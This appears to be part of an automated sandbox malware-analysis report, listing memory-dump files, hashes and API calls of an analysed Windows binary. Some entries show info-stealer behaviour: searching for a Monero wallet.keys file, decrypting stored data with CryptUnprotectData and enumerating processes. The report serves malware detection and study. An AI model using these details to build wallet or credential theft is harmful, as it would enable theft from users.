                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                • String ID: /
                                • API String ID: 3090951853-4001269591
                                • Opcode ID: a8a59c76877398e3012edcc6ab5d70b4b7f343548119f1d9b64d8ea7c18de577
                                • Instruction ID: 63fd19638359c5e1f49d4fd64cd00900e60f63ab7dad96b1d451e481e2724080
                                • Opcode Fuzzy Hash: a8a59c76877398e3012edcc6ab5d70b4b7f343548119f1d9b64d8ea7c18de577
                                • Instruction Fuzzy Hash: F0412E71950218ABDB24DF94DC99BEDB3B4FF48700F2041AAE50976281DB742F86CFA1
                                Function 0129E95B Relevance: 10.4, Strings: 7, Instructions: 1694COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 2W+$@OV$OAk6$O_RN$^A$$gE}}$rU|M
                                • API String ID: 0-3737528765
                                • Opcode ID: bb22e03fbfada0c5294ffd742c8c2ba59fa3eb5fd38d9700fb48d08720432240
                                • Instruction ID: 962f8f40501cfc57c8fc9311b3492df43c8cf30ae5dfa8a29ee5ccffec643673
                                • Opcode Fuzzy Hash: bb22e03fbfada0c5294ffd742c8c2ba59fa3eb5fd38d9700fb48d08720432240
                                • Instruction Fuzzy Hash: 74B23CF360C2049FE304AE2DEC8567BBBE9EFD4620F1A853DE6C4C7744E67598018696
                                Function 0129B32B Relevance: 10.4, Strings: 7, Instructions: 1629COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 3YvL$A5l~$M?w$W$w$[$w$uI6/$)tD
                                • API String ID: 0-1347006738
                                • Opcode ID: 814f90e434920abd5b88c43d69569c574941723899e6a35e5793785b93df1280
                                • Instruction ID: e91e39373be12e867032c5ac34b423cbf6c395476bca08ffda45a08bbf73acd5
                                • Opcode Fuzzy Hash: 814f90e434920abd5b88c43d69569c574941723899e6a35e5793785b93df1280
                                • Instruction Fuzzy Hash: 03B207F360C2009FE708AF2DDC8567ABBE5EF94720F1A893DE6C5C7744EA3558018696
                                Function 01297D17 Relevance: 10.3, Strings: 7, Instructions: 1575COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: c[{$2_k$?A3$B-d$hD~}$Ai3$ky
                                • API String ID: 0-2078783676
                                • Opcode ID: bab6467895bfa599cfacfe7686fad7889befe52a625c8af9f300dce36a174f87
                                • Instruction ID: 963af2d25f5e69b038ab260602792bb02235ab26a9c10b6bed6e4ca6dce74e0a
                                • Opcode Fuzzy Hash: bab6467895bfa599cfacfe7686fad7889befe52a625c8af9f300dce36a174f87
                                • Instruction Fuzzy Hash: 81B2E5F3A0C2049FE304AE2DEC8567ABBE5EF94720F16892DEAC4C7344E63558458797
                                Function 00ECE430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00EDA920: lstrcpy.KERNEL32(00000000,?), ref: 00EDA972
                                  • Part of subcall function 00EDA920: lstrcat.KERNEL32(00000000), ref: 00EDA982
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,01B88950,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00EE0D73), ref: 00ECE4A2
                                • StrCmpCA.SHLWAPI(?,00EE14F8), ref: 00ECE4F2
                                • StrCmpCA.SHLWAPI(?,00EE14FC), ref: 00ECE508
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00ECEBDF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                • String ID: \*.*
                                • API String ID: 433455689-1173974218
                                • Opcode ID: 45990e5f19ce55076f8068303ce489b2f0bc9335365594dbd00cc765b3b0c29d
                                • Instruction ID: dba77624b744bbdaaf1efabc4c6b18dc796cdb627c57e01fda9aa189b837d5b5
                                • Opcode Fuzzy Hash: 45990e5f19ce55076f8068303ce489b2f0bc9335365594dbd00cc765b3b0c29d
                                • Instruction Fuzzy Hash: 621255369001189ADB18FB60DD96EED73B9EF54300F4451BAB50A72281EF705F8ACF92
                                Function 00EC9AC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON
                                Download Yara Rule
                                APIs
                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00EC9AEF
                                • LocalAlloc.KERNEL32(00000040,?,?,?,00EC4EEE,00000000,?), ref: 00EC9B01
                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00EC9B2A
                                • LocalFree.KERNEL32(?,?,?,?,00EC4EEE,00000000,?), ref: 00EC9B3F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptLocalString$AllocFree
                                • String ID: N
                                • API String ID: 4291131564-1689755984
                                • Opcode ID: 4b547632dceef005607afca3b60e862e6ed490dbd0e8a9315f5e9708976c6198
                                • Instruction ID: 8a999b67e7651f12990c47b793cca18c929188265184b3f9580bb90a78a96a87
                                • Opcode Fuzzy Hash: 4b547632dceef005607afca3b60e862e6ed490dbd0e8a9315f5e9708976c6198
                                • Instruction Fuzzy Hash: 6611D2B4640308BFEB14CF64D895FAA77B5FB89705F208059FD15AB384C7B2AA41CB90
                                Function 0128F6F9 Relevance: 7.9, Strings: 5, Instructions: 1630COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: jVcm$u$u-g~$uc9?$vw
                                • API String ID: 0-2623730173
                                • Opcode ID: 2bb9d284822eba911dec9fee820bc5ce32873563d2475d14ec194ca79103a302
                                • Instruction ID: d5fab6000d9f6ba5933cd27268b8e5f3db707c03f1930e0cf130bb1dbfcc4b54
                                • Opcode Fuzzy Hash: 2bb9d284822eba911dec9fee820bc5ce32873563d2475d14ec194ca79103a302
                                • Instruction Fuzzy Hash: 57B2E6F3A086049FE304AE2DEC8577ABBE9EF94720F16493DEAC4C3744E63558058697
                                Function 00ECC820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00ECC871
                                • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00ECC87C
                                • lstrcat.KERNEL32(?,00EE0B46), ref: 00ECC943
                                • lstrcat.KERNEL32(?,00EE0B47), ref: 00ECC957
                                • lstrcat.KERNEL32(?,00EE0B4E), ref: 00ECC978
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$BinaryCryptStringlstrlen
                                • String ID:
                                • API String ID: 189259977-0
                                • Opcode ID: 584a729246972c97fe31018e46e02e4d87baff2d967f25a2c5d660065352f10f
                                • Instruction ID: b78bdff9b7f2d190d99034bf5720e9465c489715024aecdf92387834c2c4d70f
                                • Opcode Fuzzy Hash: 584a729246972c97fe31018e46e02e4d87baff2d967f25a2c5d660065352f10f
                                • Instruction Fuzzy Hash: 9C415B75D0420A9BCB24CFA0DD89BEEB7B8BF88304F1041A8E509B7284D7B15A85CF91
                                Function 00EC7240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00EC724D
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00EC7254
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00EC7281
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00EC72A4
                                • LocalFree.KERNEL32(?), ref: 00EC72AE
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                • String ID:
                                • API String ID: 2609814428-0
                                • Opcode ID: 104becde33b92ff46bd2e1461157b073acdbacd70b8c1ae0d509d0939cf30a8d
                                • Instruction ID: a870b2fb9d94344a8bd4ad763b55ba33c0fd08eeac32382db6215b60140e6f13
                                • Opcode Fuzzy Hash: 104becde33b92ff46bd2e1461157b073acdbacd70b8c1ae0d509d0939cf30a8d
                                • Instruction Fuzzy Hash: 6F0140B5A40308BBEB24DBD4DD46F9D7778AB44701F104059FB15BB2C4D6B0AA418B64
                                Function 00ED9600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                                Download Yara Rule
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00ED961E
                                • Process32First.KERNEL32(00EE0ACA,00000128), ref: 00ED9632
                                • Process32Next.KERNEL32(00EE0ACA,00000128), ref: 00ED9647
                                • StrCmpCA.SHLWAPI(?,00000000), ref: 00ED965C
                                • CloseHandle.KERNEL32(00EE0ACA), ref: 00ED967A
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                • String ID:
                                • API String ID: 420147892-0
                                • Opcode ID: dd9e875c120224952a632970a2c2371159a89ddbdb523324f242c46eab7f1d87
                                • Instruction ID: a187859cef779ce4215b34ed10d8234d30f617a9450f7a61e81fc4c01ad030d7
                                • Opcode Fuzzy Hash: dd9e875c120224952a632970a2c2371159a89ddbdb523324f242c46eab7f1d87
                                • Instruction Fuzzy Hash: F9012975A00208ABCB25DFA4D848BEDB7F8EF08301F004199A916A7240DB749B81CF50
                                Function 012946EB Relevance: 6.6, Strings: 4, Instructions: 1601COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: ,u]$:NZ$4G?$Qz
                                • API String ID: 0-1775770776
                                • Opcode ID: 437023584354754913465e2da5ba544114211950d3527ca2406bf6fdf5fe429a
                                • Instruction ID: bbc49841cf8de862beec7822e466ce89b9217384f54af1c766cf212c0b1def5f
                                • Opcode Fuzzy Hash: 437023584354754913465e2da5ba544114211950d3527ca2406bf6fdf5fe429a
                                • Instruction Fuzzy Hash: 1AB2F7F3A0C2049FE3046E2DDC8567AFBE9EF94720F1A893DE6C487744EA3558058697
                                Function 0128C1B7 Relevance: 6.6, Strings: 4, Instructions: 1595COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
